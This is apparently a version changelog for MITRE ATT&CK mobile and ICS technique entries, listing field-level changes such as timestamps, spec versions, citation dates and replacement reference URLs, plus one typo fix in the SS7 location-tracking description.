[T1417.002] Input Capture: GUI Input Capture
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:20:41.834000+00:00 | 2024-11-17 18:58:58.592000+00:00 |
external_references[10]['description'] | Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016. | Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved November 17, 2024. |
external_references[10]['url'] | https://www.skycure.com/blog/accessibility-clickjacking/ | https://web.archive.org/web/20170211204349/https://www.skycure.com/blog/accessibility-clickjacking/ |
[T1643] Generate Traffic from Victim
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:57:17.144000+00:00 | 2025-04-16 21:21:53.113000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1627.001] Execution Guardrails: Geofencing
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:58:14.240000+00:00 | 2025-04-16 21:21:58.143000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1628] Hide Artifacts
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:59:57.485000+00:00 | 2025-04-16 21:21:59.084000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1625] Hijack Execution Flow
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:59:46.686000+00:00 | 2025-04-16 21:21:50.121000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1617] Hooking
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:21:55.543000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1629] Impair Defenses
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:59:55.849000+00:00 | 2025-04-16 21:21:45.996000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1430.002] Location Tracking: Impersonate SS7 Nodes
Current version: 1.1
Description diff (old value → new value): the duplicated phrase "to track the to track the location of mobile devices" was corrected to "to track the location of mobile devices"; the rest of the description, including all citations, is unchanged.
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-15 15:06:03.427000+00:00 | 2025-01-21 16:22:43.947000+00:00 |
description | Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)
By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7) | Adversaries may exploit the lack of authentication in signaling system network nodes to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)
By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630] Indicator Removal on Host
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:42:18.121000+00:00 | 2025-04-16 21:21:44.391000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1544] Ingress Tool Transfer
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:21:05.728000+00:00 | 2025-04-16 21:21:47.175000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1417] Input Capture
Current version: 2.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:44:36.145000+00:00 | 2025-04-16 21:21:52.964000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1516] Input Injection
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-08 22:50:32.775000+00:00 | 2025-04-16 21:21:56.042000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1634.001] Credentials from Password Store: Keychain
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:45:39.362000+00:00 | 2025-04-16 21:21:51.670000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1417.001] Input Capture: Keylogging
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:48:39.936000+00:00 | 2025-04-16 21:21:53.936000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1430] Location Tracking
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:50:21.363000+00:00 | 2025-04-16 21:21:52.460000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1655] Masquerading
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 18:14:46.081000+00:00 | 2025-04-16 21:21:58.771000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1655.001] Masquerading: Match Legitimate Name or Location
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 18:15:15.902000+00:00 | 2025-04-16 21:21:44.590000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1575] Native API
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-08 15:46:24.495000+00:00 | 2025-04-16 21:21:49.389000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1464] Network Denial of Service
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:51:23.109000+00:00 | 2025-04-16 21:21:56.195000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1423] Network Service Scanning
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-11 19:12:38.451000+00:00 | 2025-04-16 21:21:47.481000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1509] Non-Standard Port
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 19:21:40.736000+00:00 | 2025-04-16 21:21:51.980000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1406] Obfuscated Files or Information
Current version: 3.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-09 14:38:34.859000+00:00 | 2025-04-16 21:21:55.894000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1481.003] Web Service: One-Way Communication
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:35:55.739000+00:00 | 2025-04-16 21:21:56.869000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1644] Out of Band Data
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:53:59.025000+00:00 | 2025-04-16 21:21:58.451000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1424] Process Discovery
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:55:23.702000+00:00 | 2025-04-16 21:21:45.337000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1631] Process Injection
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:55:54.442000+00:00 | 2025-04-16 21:21:54.246000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636] Protected User Data
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:56:20.270000+00:00 | 2025-04-16 21:21:44.829000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1604] Proxy Through Victim
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:57:14.285000+00:00 | 2025-04-16 21:21:49.548000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1631.001] Process Injection: Ptrace System Calls
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:57:40.571000+00:00 | 2025-04-16 21:21:45.841000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1663] Remote Access Software
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-25 19:53:07.406000+00:00 | 2025-04-16 21:21:44.009000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1430.001] Location Tracking: Remote Device Management Services
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:58:20.113000+00:00 | 2025-04-16 21:21:52.807000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1458] Replication Through Removable Media
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-07 17:13:04.396000+00:00 | 2024-11-17 13:26:29.167000+00:00 |
external_references[4]['description'] | Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved September 21, 2018. | Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html | https://www.techcentral.ie/two-vendors-now-sell-iphone-cracking-technology-police-buying/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1582] SMS Control
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:58:57.001000+00:00 | 2025-04-16 21:21:54.090000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.004] Protected User Data: SMS Messages
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:58:33.873000+00:00 | 2025-04-16 21:21:54.890000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1603] Scheduled Task/Job
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:21:43.650000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1513] Screen Capture
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:57:43.022000+00:00 | 2025-04-16 21:21:50.988000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1418.001] Software Discovery: Security Software Discovery
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:55:33.642000+00:00 | 2025-04-16 21:21:45.687000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1418] Software Discovery
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:55:03.477000+00:00 | 2025-04-16 21:21:45.152000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1406.002] Obfuscated Files or Information: Software Packing
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:54:40.501000+00:00 | 2025-04-16 21:21:49.224000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1406.001] Obfuscated Files or Information: Steganography
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-21 17:30:16.229000+00:00 | 2025-04-16 21:21:58.917000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1409] Stored Application Data
Current version: 3.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:53:16.029000+00:00 | 2024-11-17 18:31:54.805000+00:00 |
external_references[1]['description'] | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019. | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024. |
external_references[1]['url'] | https://securitywithoutborders.org/blog/2019/03/29/exodus.html | https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1632] Subvert Trust Controls
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:52:52.097000+00:00 | 2025-04-16 21:21:51.458000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474] Supply Chain Compromise
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:52:29.947000+00:00 | 2024-11-17 13:32:52.029000+00:00 |
external_references[1]['description'] | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016. | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf | https://dl.acm.org/doi/10.1145/2185448.2185464 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1521.001] Encrypted Channel: Symmetric Cryptography
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-05 20:14:17.310000+00:00 | 2025-04-16 21:21:54.401000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1633.001] Virtualization/Sandbox Evasion: System Checks
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:51:04.432000+00:00 | 2025-04-16 21:21:50.837000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1426] System Information Discovery
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-11 19:21:34.776000+00:00 | 2025-04-16 21:21:57.841000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1421] System Network Connections Discovery
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-31 16:31:12.821000+00:00 | 2025-04-16 21:21:57.189000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1625.001] Hijack Execution Flow: System Runtime API Hijacking
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 19:20:51.220000+00:00 | 2025-04-16 21:21:55.191000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1641.001] Data Manipulation: Transmitted Data Manipulation
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:44:26.748000+00:00 | 2025-04-16 21:21:51.156000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1635.001] Steal Application Access Token: URI Hijacking
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:43:49.443000+00:00 | 2025-04-16 21:21:51.304000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630.001] Indicator Removal on Host: Uninstall Malicious Application
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:43:03.218000+00:00 | 2025-04-16 21:21:44.210000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1623.001] Command and Scripting Interpreter: Unix Shell
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-07 22:48:30.418000+00:00 | 2025-04-16 21:21:50.314000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1628.002] Hide Artifacts: User Evasion
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-11 20:05:56.069000+00:00 | 2025-04-16 21:21:46.535000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1512] Video Capture
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:38:27.848000+00:00 | 2025-04-16 21:21:56.716000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1633] Virtualization/Sandbox Evasion
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 18:37:57.884000+00:00 | 2025-04-16 21:21:46.725000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1437.001] Application Layer Protocol: Web Protocols
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-06 13:07:45.661000+00:00 | 2025-04-16 21:21:46.363000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1481] Web Service
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 16:31:37.317000+00:00 | 2025-04-16 21:21:55.035000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
ics-attack
Patches
[T0800] Activate Firmware Update Mode
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:59.593000+00:00 | 2025-04-16 21:26:10.552000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0830] Adversary-in-the-Middle
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:08.233000+00:00 | 2025-04-16 21:26:16.777000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0878] Alarm Suppression
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:01.578000+00:00 | 2025-04-16 21:26:11.789000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0802] Automated Collection
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-05 16:34:58.587000+00:00 | 2025-04-15 19:58:24.843000+00:00 |
[T0895] Autorun Image
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-08 18:54:40.925000+00:00 | 2025-04-15 19:58:42.824000+00:00 |
[T0803] Block Command Message
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:58.380000+00:00 | 2025-04-15 19:58:01.218000+00:00 |
[T0804] Block Reporting Message
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:04.376000+00:00 | 2025-04-16 21:26:13.771000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0805] Block Serial COM
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:00.184000+00:00 | 2025-04-16 21:26:10.923000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0806] Brute Force I/O
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:08.037000+00:00 | 2025-04-16 21:26:16.573000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0892] Change Credential
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:14.123000+00:00 | 2025-04-16 21:26:20.690000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0858] Change Operating Mode
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:01.367000+00:00 | 2025-04-16 21:26:11.583000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0807] Command-Line Interface
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:00.378000+00:00 | 2025-04-16 21:26:11.069000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0885] Commonly Used Port
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:12.723000+00:00 | 2025-04-16 21:26:19.961000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0884] Connection Proxy
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:11.730000+00:00 | 2025-04-16 21:26:19.127000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0879] Damage to Property
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:06.993000+00:00 | 2025-04-16 21:26:15.731000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0809] Data Destruction
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:04.784000+00:00 | 2025-04-16 21:26:14.108000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0811] Data from Information Repositories
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:03.187000+00:00 | 2025-04-16 21:26:13.205000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0893] Data from Local System
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-09 20:51:03.049000+00:00 | 2025-04-15 19:59:23.577000+00:00 |
[T0812] Default Credentials
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:07.653000+00:00 | 2025-04-16 21:26:16.206000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0813] Denial of Control
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:12.329000+00:00 | 2025-04-15 19:59:15.775000+00:00 |
external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0814] Denial of Service
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 19:00:55.006000+00:00 | 2025-04-15 19:58:10.656000+00:00 |
[T0815] Denial of View
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:05.576000+00:00 | 2025-04-15 19:58:33.142000+00:00 |
external_references[2]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
external_references[2]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0868] Detect Operating Mode
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:01.778000+00:00 | 2025-04-16 21:26:11.972000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0816] Device Restart/Shutdown
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:00.768000+00:00 | 2025-04-16 21:26:11.395000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0817] Drive-by Compromise
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:06.780000+00:00 | 2025-04-16 21:26:15.525000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0871] Execution through API
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:05.776000+00:00 | 2025-04-16 21:26:14.643000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0819] Exploit Public-Facing Application
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:02.990000+00:00 | 2025-04-16 21:26:13.044000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0820] Exploitation for Evasion
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:08.425000+00:00 | 2025-04-16 21:26:16.960000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0890] Exploitation for Privilege Escalation
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:11.342000+00:00 | 2025-04-16 21:26:18.792000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0866] Exploitation of Remote Services
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:07.457000+00:00 | 2025-04-16 21:26:16.054000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0822] External Remote Services
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:07.840000+00:00 | 2025-04-16 21:26:16.385000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0823] Graphical User Interface
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:08.992000+00:00 | 2025-04-16 21:26:17.144000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0891] Hardcoded Credentials
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:10.962000+00:00 | 2025-04-16 21:26:18.583000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0874] Hooking
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:08.803000+00:00 | 2025-04-15 19:58:56.978000+00:00 |
external_references[2]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0877] I/O Image
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:05.375000+00:00 | 2025-04-16 21:26:14.462000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0872] Indicator Removal on Host
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:05.190000+00:00 | 2025-04-16 21:26:14.295000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0883] Internet Accessible Device
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:13.719000+00:00 | 2025-04-16 21:26:20.494000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0867] Lateral Tool Transfer
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:13.327000+00:00 | 2025-04-16 21:26:20.126000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0826] Loss of Availability
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:09.581000+00:00 | 2025-04-15 19:59:00.088000+00:00 |
